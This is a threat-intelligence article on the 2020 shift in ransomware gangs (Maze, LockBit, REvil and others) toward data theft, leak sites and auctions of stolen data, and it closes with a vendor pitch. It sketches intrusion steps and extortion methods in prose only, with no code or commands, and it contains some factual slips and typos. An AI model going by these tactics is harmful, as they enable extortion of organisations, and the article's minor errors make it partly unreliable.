2020, a year that will be remembered for many reasons. Stories will be told to children and grandchildren of when we all had to wear face masks, stand 6 feet apart, there were no sports, and where people were not permitted to hug or shake hands. Then there was the next economic collapse and subsequent worldwide insurrection. For those who hunt cybercriminals and attempt to expose criminal and state-sponsored hacking operations and techniques, the blurring of the lines between what constitutes a ransomware attack and data breach will be the chosen horror story, starting with the Maze ransomware group.
The main goal of the Maze ‘Cha Cha’ ransomware is to encrypt all files that it can in an infected system and then demand a ransom to recover the files the threat actor who took credit for locking up a very large US insurance company. And it appears Maze is continuing its attacking spree with full intensity. The Maze ransomware malware distribution saw an opportunity it could not ignore and continue to force victim companies to pay large ransoms. Ingenious in its lack of sophistication, and devious in the extra stress it causes business leaders. Maze threatens to release stolen data if the initial ransom demanded to decrypt encrypted files is not paid promptly. These threats continue to be a severe reality.
On New Year’s Day 2020, media reported that one of the victims of the Maze gang was suing the ransomware operators, referred to as “John Doe” in filed legal papers. This for illegally accessing the company’s network, encrypting files, and publishing data when the ransom was not paid. The company, Southwire, fell victim to a Maze attack in December 2019. Maze, before encrypting vital files needed to operate at an acceptable level, stole 120GB of data and proceeded to encrypt 878 devices.
The company did as is often advised and did not pay the ransom, which resulted in the ransomware gang publishing a section of the stolen data, showing that it would make good on its threats. The ransom amount initially was set at 850 bitcoins—approximately $6 million at the time, a staggering amount when compared to the several hundred demanded in the malware’s infancy. However, in an age of human-operated ransomware that is has a goal to topple giant corporations, millions now are being demanded with the amount dependent on how well-off the company is perceived to be and how anxious they may be to get back to business.
By the end of January 2020, the gang was releasing the data of multiple victims to extort payment from its victims. Given the extra pressure now faced by businesses to pay or not to pay again resurfaced and is now in a higher gear. But on a funny note, the Maze ransomware gang just recently screwed up by targeting a New York, NY design and construction firm instead of the Canadian Standards Association it intended to hit. Maze appears to have confused the organization with another CSA Group (csagroup.com), which is a Puerto Rice-based engineering management firm that appears to have its data stolen and encrypted. This may expose the sophistication level of the group, yet they remain a serious threat.
By not only threatening but releasing stolen data, what was once treated as a ransomware incident is now also a data breach. If that data contains information protected by numerous data privacy laws, such as GDPR or PCI DSS, the company may be further fined due to non-compliance if the data was not properly managed. It has been argued that a ransomware attack amounts to a data breach regardless of whether data is released to the public; however, these cybersecurity debates have become purely academic in the face of current realities.
This pattern has continued with the latest development in the Maze saga, as the group seems to have teamed up with the gang behind Ragnar Locker. The partnership involves the shared use of the data-leaking platform created by those behind Maze. This would be the second group to partner with Maze, the first being LockBit. Lockbit was first seen when a malicious actor used a brute-force method on a web server that contained an outdated virtual private network (VPN). This attempt took several days for the actor to gain the required “Administrator” password. With the keys to the network kingdom, the nefarious individual abused Server Message Block (SMB) to perform automated network reconnaissance to then own more company systems. In the meantime, the malicious actor had already deployed the ransomware by instructing the compromised host to run a PowerShell command that retrieved a .png file from the compromised site. This host then instructed all other hosts, to which the attacker gained access, to execute the same PowerShell command, thereby automating the ransomware distribution process.
The payload of the retrieved dropper used two variants of a User Account Control (UAC) bypass to minimize the level of user interaction in its attack chain. It also loaded its modules dynamically to trick static analysis engines. This gave the threat the cover it needed to stop certain processes and delete shadow volume copies before it ultimately performed its encryption routine and dropped its ransom note.
The current partnership seems to be driven by the sharing of information and intelligence that can help future black hat operations become more effective at turning target networks into victim networks. As to what exactly Maze gets from the partnership, as it appears to researchers Maze is the main contributor group and is sharing its data-leaking platform. It is plausible that the associate groups get a share of the other’s profits for providing the Maze Platform as a Service. As more ransomware gangs struggle to successfully target big companies and organizations, cooperation between gangs is viewed as the next disturbing hacker trend that will shape the cyber threat landscape. The sharing of resources, intelligence, and ultimately victims will make ransomware more and more difficult to combat.
Soon after Maze began publishing stolen data, other groups joined the ransomware bandwagon. One of those was Sodinokibi (which Red Sky Alliance has reported on), also called Sodin and REvil by several security firms and media houses which published data appearing on a well-known Russian hacker forum. Prior to this Sodinokibi auction, REvil like many other ransomware gangs has sought to pressure victim companies into paying up by publishing a handful of sensitive files stolen from their extortion targets and then threatening to release more data unless and until the ransom demand is paid. Cyber threat experts say its recent auction is a sign that ransomware groups may be feeling the financial pinch from the current economic crisis, and are looking for new ways to extract value from victims who are now less likely or able to pay a ransom demand. Approximately 337MB was dumped to show that this gang was willing to make good on a threat it made earlier, soon after Maze began dumping data. Around the same time, the ransomware group had captured two high-level victims - Travelex and CDH Investments. Since these companies publicly stated they will not pay the ransom, it indicates a targeted and purposeful ransomware attack. In late 2019, the US Department of Justice (USDOJ) offered a $5 million bounty for information leading to the arrest and conviction of a Russian man, Maksim Viktorovich Yakubets, indicted for allegedly orchestrating a vast, international cybercrime network that called itself “Evil Corp” (REvil) and stole roughly $100 million from businesses and consumers.
Cybersecurity researchers published a follow-up report detailing the cost associated with ransomware for the first quarter of 2020, which again had risen, another 33 percent over the previous quarter. In the 4th quarter of 2019, the average ransom payment increased by 104 percent to $84,116. This up from $41,198 in 3rd quarter of 2019. While the median ransomware payment in the 4th quarter $14,179, the doubling of the average reflects the diversity of the threat actors that are actively attacking companies. Some criminal groups, such as Ryuk and Sodinokibi, have moved into the large enterprise space and are focusing their attacks on large companies where they can attempt to extort the organization for a seven-figure payout. For instance, Ryuk ransom payments reached a new high of $780,000 for impacted enterprises. On the other end of the spectrum, smaller Ransomware-as-a-Service variants such as Dharma, Snatch, and Netwalker continue to target the small business space with a high number of attacks. With demands as low as $1,500. Even these lower ransom amounts can cause serious damage in the SMB market. If the Corona pandemic economic downturn did not get the medium to small business, these lover level ransomware attack could very well close their doors for good.
In the 1st quarter of 2020, the average enterprise ransom payment increased to $111,605, up 33 percent from the 4th quarter of 2019. Ransomware distributors increasingly targeted large enterprises and were successful in forcing ransom payments for the safe recovery of data. Large enterprise ransom payments are the minority by volume, but the size of the payments dramatically pulled up the average ransom payment. The medium ransom payment remained relatively stable at $44,021, up only slightly from the 4th quarter medium of $42,179. The stability of the medium reflects the fact that the most ransom payments were modest relative to the average.
According to cyber investigators, Sodinokibi featured heavily as one of the main attackers responsible for the spike in ransomware costs. A key point discussed in their reports was the ransomware groups that were also making use of what the report describes as “data exfiltration” and what this article refers to as “data theft.” The maze was the only ransomware that was seen to decrease in data exfiltration attempts while others, including Sodinokibi, increased attempts to steal data. One such attack by Sodinokibi, of international interest, was the successful data exfiltration and encryption of the US legal firm Grubman Shire Meiselas & Sacks. The firm represents John Mellencamp, Elton John, David Letterman, Robert DeNiro, Christina Aguilera, Barbra Streisand, Bruce Springsteen, and Madonna to name a few, as well as numerous high-profile corporate entities.
The gang claims to have stolen 756GB worth of data from the law firm, and even threatened to release information discovered in the attack belonging to US President Donald Trump; however, it is unclear whether the law firm represents Trump in any of his private or public ventures. To prove that the gang did indeed have sensitive data on celebrities, it published a small amount of data pertaining to Christina Aguilera and Madonna. The announcement was made via its blog, ironically titled, “Happy Blog.” Such announcements certainly applied increased pressure to the law firm’s decision-makers regarding whether to pay the ransom. The initial ransom demanded was $21 million USD, which would double if it were not paid promptly. As the writing of this report, Happy Blog is currently down.
The latest development in this story involves the Sodinokibi group creating an eBay-like auction site to sell the stolen data. The group claims to have already sold the data pertaining to Trump for $1 million and was looking to find buyers for the data pertaining to Madonna. This likely inspired the group to offer a bidding service to make it easier for those looking to gain information that could be used for blackmail, identity theft or numerous other destructive cyber activity.
The auction site was added to its blog at the start of June 2020. Reports from the time reported that the group was auctioning information belonging to two companies: a US food distributor and a Canadian agricultural company. The food distributor’s data started bids at $100,000 but the lot could be had for $200,000. The Canadian data had a similar bid and sale structure, this time bids started at $50,000 and bought once-off for $100,000.
The auction site even had a list of rules bidders had to agree to before participating. To bid on action, one has to register for each auction separately. After registration, you will need to make a deposit of 10 percent of the starting price. At the end of the auction, the amount will be refunded (except for blockchain commission). If you have not paid your bid on the winning auction, you will lose your deposit. This is to ensure that none of the bidders make fake bids. All computational operations are performed in the cryptocurrency Monero (XMR). By clicking ‘Continue,’ you confirm that you agree to the terms above. You will be given a username/password and details of deposit payment.
With ransomware operators looking to diversify their portfolios by making money off stolen data via auctions, the threat posed to organizations has increased significantly. To date, major law firms and Fortune 500 companies have fallen victim to ransomware incidents. The attackers also have other tricks in their malware bag which help their illegal activities. Not only are Maze and Sodinokibi releasing and auctioning off stolen data; currently, Ako, Clop, DoppelPaymer, Mespinoza, Nefilim, Nemty, NetWalker, Ragnar Locker, Sekhmet, and Snatch also have adopted similar tactics.
For the victims, the question of whether to pay adds complexity. It is clear some organizations do pay the ransom yet are faced with the added potential cost of fines for non-compliance with cyber regulations. The need to pay the ransom has raised the stakes beyond tolerable levels. However, despite the pressures faced by decision-makers, the advice is still not to pay the ransom. Not only do ransoms fund criminal enterprises but paying also opens the organization to exploitation from other ransomware and malware gangs working with the original black hat hacker.
During a recent interview, a spokesperson for the FBI summed up this view, “The FBI encourages victims to not pay a hacker’s extortion demands. The payment of extortion demands encourages continued criminal activity, leads to other victimizations, and can be used to facilitate additional serious crimes. Furthermore, paying a ransom does not guarantee the victim will regain access to their data. The best approach is to focus on defense-in-depth and have several layers of security as there is no single method to prevent compromise or exploitation.”
Security experts have yet not been able to trace the country of origin of the Maze ransomware. During their examination, McAfee Labs found some of the IP addresses belonging to the Russian Federation. However, it is not enough to confirm the origins, as IP spoofing is a common practice used by attackers to deliberately misdirect investigations and even cause disharmony among two states. In the past, Maze has been in the news for attacks against dozens of large businesses, conglomerates, government contractors, and IT service companies.
Red Sky Alliance has an expert white-hat hacker who emphasizes that there are generally two methods for big game ransomware extortion: blog with PII leaks (automated) and direct E-Mail (manual). Our analysts observed this behavior with Snatch ransomware. The group started manual, then moved to automated, and went back to manual extortion requiring the users to reach out to a specific Protonmail (Swiss service) address with their encrypted files extension. Every extension was unique to that client and was generated using some system and network meta-data. In our opinion, the automated platforms are more effective, because like Sodinokibi who openly states, “if a company doesn't pay our demands, they can pay 10x in GDPR fines.” The manual method, if conducted correctly with a new bulletproof email address being used to contact each victim, can be more OPSEC safe and will likely be adopted by English speaking hackers before the highly lucrative affiliate (organized crime) models we see in Russian forums.
Red Sky Alliance strongly recommends ongoing monitoring from both internal and external perspectives. Internal monitoring is common practice. However, external threats are often overlooked and can represent an early warning of impending attacks. Red Sky Alliance can provide both internal monitorings in tandem with RedXray notifications on external threats to include, botnet activity, public data breaches, phishing, fraud, and general targeting. Red Sky Alliance is in New Boston, NH USA. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or firstname.lastname@example.org